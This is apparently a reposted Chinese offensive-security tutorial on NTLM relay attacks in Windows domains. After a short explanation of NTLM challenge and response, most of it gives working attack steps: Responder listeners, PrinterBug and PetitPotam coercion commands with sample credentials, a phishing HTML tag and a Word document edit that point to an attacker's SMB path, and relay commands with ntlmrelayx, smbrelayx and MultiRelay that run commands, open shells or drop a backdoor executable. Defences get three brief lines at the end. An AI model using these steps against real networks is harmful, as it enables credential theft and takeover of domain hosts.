0x01 初始NTLM协议
Challenge和Response分析
0x02 NTLM Relay介绍
中继原理
中继步骤
0x03 捕获Net-NTLM Hash
0x04 NTLM Relay利用
0x05 NTLM Relay防御
0x01 初识NTLM协议
-
首先,client会向server发起请求连接协商一些相关东西 -
server就会在本地生成一个(16位或8位)随机字符,即Challenge,并将Challenge传给client -
当client接收到Challenge时,将username的NTLM-hash对Challenge进行加密(加密过程中会利用到用户名、域名、机器名等相关信息),生成Response,并将Response发送给server -
server在收到Response后,将其和相同的方式进行加密生成另一个Response,如果相同,则验证成功,如果不同就失败
Challenge和Response分析
Challenge:client向server发起协商后,server会随机产生一个Challenge值给client,它是无法预估的,每一次值都不会一样
Response:response=NTProofStr+blob
NTProofStr=将NTLM-V2-HASH(key)和(challenge+blob)两个进行HMAC-MD5加密
NTLM-V2-HASH=(大写的用户名+域名)编码成Unicode格式和用户密码的hash值(key)两个进行HMAC-MD5加密
blob:是由时间,目标信息,随机填充字符生成
因此在我们平时使用工具进行攻击的时候抓到的都是Net-NTML-Hash的数据
Net-NTML-Hash:username:domain:challenge:NTProofStr:blob
0x02 NTLM Relay介绍
中继原理
如下图所示,在认证的整个流程中,攻击者充当一个中间人,此时,在客户端的眼中,他就是服务端,而在服务端的眼中,他又是客户端。通过这种方式,攻击者就可以伪造客户端来完成身份验证,而在服务端看来一直只有攻击者在跟他交互,所以全程就会把攻击者认为是客户端,这样攻击者就达到了伪造客户端的目的。
中继步骤
-
获得受害者Net-NTLM Hash
-
使用Net-NTLM Hash进行重放攻击
注:因为Net-NTLM Hash不能直接发送给电脑,必须要有一个应用层协议来进行封装,如SMB、HTTP、RPC、LDAP,但是能不能中继到该协议,还需要看一下该协议是否有漏洞,是否支持等等
0x03 捕获Net-NTLM Hash
捕获NET-NTLM的方式有很多,捕获阶段分为两步:
1.在B电脑上发起监听
2.A电脑发送认证信息
利用打印机漏洞
kali开启监听
responder -I 监听网卡名 -wd
Windows的MS-RPRN协议用于打印客户端和服务器之前的通信,默认情况下是启用的。该协议定义的RpcRemoteFindFirstPrinterChangeNotificationEx()方法调用会创建一个远程更改通知对象,该对象对打印机对象的更改进行监视,并将更改通知发送到客户端。任何经过身份验证的域成员都可以连接到远程服务器的打印服务spoolsv.exe,并请求对一个新的打印作业进行更新,令其将该通知发送给指定目标,之后它将立即测试该连接,即向指定目标进行身份验证。
python3 printerbug.py '域名/账号:密码@目标ip' 'kali_ip'
回到刚才监听的窗口,发现以经捕获到Net-NTLM Hash
该漏洞利用了微软加密文件系统远程协议(MS-EFSRPC), MS-EFSRPC用于对远程协议存储和通过网络访问的数据执行维护和管理操作。利用PetitPotam,安全研究院可以通过连接到LSARPC强制触发目标机器向指定的远程服务器发送Net-NTLM Hash
python3 PetitPotam.py -d abc.com -u anna -p 'admin!@#[email protected]' -pipe all listener 192.168.24.25
利用LLMNR&NBNS攻击
我们知道,在电脑的认证机制中,默认是以当前账号密码进行认证,所以,该攻击方式的原理就是当用户任意输入一个不存在的名称,本地hosts文件和DNS服务器均不能正常解析该名称,于是系统就会发送LLMNR/NBNS数据包请求解析。攻击者收到请求后告诉客户端自己是不存在的名称要求客户端发送给Net-NTLM Hash进行认证,这样攻击者就可以收到客户端发来的Net-NTLM Hash。
通过执行系统命令,访问指定的UNC路径,也可以获取到目标机器的Net-NTLM Hash,能够触发Net-NTLM Hash的常见命令如下:
net.exe use hostshareattrib.exe hostsharecacls.exe hostsharecertreq.exe hostsharecertutil.exe hostsharecipher.exe hostshareClipUp.exe -l hostsharecmdl32.exe hostshare等等,网上还有很多,可自行查阅
利用钓鱼网页
在网页中嵌入一段js脚本来触发NTLM认证,可配合XSS、文件上传、XXE
<html lang="en"><head><meta charset="UTF-8">head><body>body><script src="\192.168.24.50test"> script>html>
利用office文档
-
msf创建
msfconsoleuse auxiliary/docx/word_unc_injectorset lhost iprun
将生成的文档放到目标主机上执行,这里之前已经抓过了,所以就是下图所看到的回显:
-
手动创建
先创建一个word文件,然后再文档里面放一个图片,退出保存,使用7z打开找到document.xml.rels文件,将图片路径,改为:
Target="\192.168.24.55test" TargetMode="External"
这里我使用的word文件,不知道是不是版本
利用系统图标
每个文件夹内都会有一个隐藏文件desktop.ini用来指定和存储文件夹图标,默认是不可见的,只需要在控制面板中去掉“隐藏受保护的操作系统文件”即可
再去访问该文件
利用PDF文件
当用户使用PDF阅读器打开一份恶意的PDF文档,该PDF会向远程SMB服务器发出请求,如果该远程SMB服务器对数据包进行抓取,就能够获得用户Windows系统的Net NTLM Hash,通过进一步破解就有可能获得用户系统的明文密码。
利用用户头像
在更改用户头像时,如果普通用户验证图片通过,那么system用户就会去访问192.168.24.102,并且携带用户凭据,就可以捕获Net-NTLM Hash
0x04 NTLM Relay利用
自从 MS08-068 漏洞修复之后无法再将 Net-NTLM 哈希值传回到发起请求的机器上,除非进行跨协议转发,但是该哈希值仍然可以通过中继转发给另外一台机器。利用Responder结合其他中继工具可以进行自动化的拦截并且对哈希值进行中继转发。唯一的一个不足之处就是,在这之前需要在进行转发操作的机器上禁用SMB签名。但是除了个别的例外,所有的Windows操作系统都默认关闭了 SMB签名。
简单说就是,A登陆了administrator这个账户,我们通过手段拿到A的Net-NTLM Hash后无法直接把这个Hash传递回A,但是如果域内的B也可以通过administrator这个账户登录,那我们可以把从A处获得的Hash传递给B,拿到B处的administrator权限
MultiRelay.py
修改Responder的配置文件,关闭SMB和HTTP (kali自带multiRelay.py 文件路径:/usr/share/responder/tools)
vim /usr/share/responder/Responder.conf
python3 MultiRelay.py -t 192.168.24.102 -u ALL 
然后在被控主机上使用错误的UNC就能够触发smb,从而获得目标主机的shell
ntlmrelayx.py
impacket文件下载:https://github.com/CoreSecurity/impacket.git
./ntlmrelayx.py -t 192.168.24.102 -c "ipconfig" -smb2support然后在被控主机上触发smb
回到kali中,得到ipconfig结果
如果要得到交互式shell,在-c后面接上powershell即可
smbrelayx.py
./smbrelayx.py -h 192.168.24.102 -c whoami同样在被控主机上触发smb
如果要得到交互式shell,利用CS或msf生成后门文件,并开启监听
./smbrelayx.py -h 192.168.24.101 -e /home/gxy/桌面/shell.exe同样在被控主机上触发smb,此时cs或者msf即可得到shell
0x05 NTLM Relay防御
-
在所有网络节点上使用SMB签名
-
禁用 NBNS 和 LLMNR 协议
-
定期更新系统
点击下方名片进入公众号,欢迎关注!
原文始发于微信公众号(赤鸢安全):【内网】内网域中NTLM中继那些事儿
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论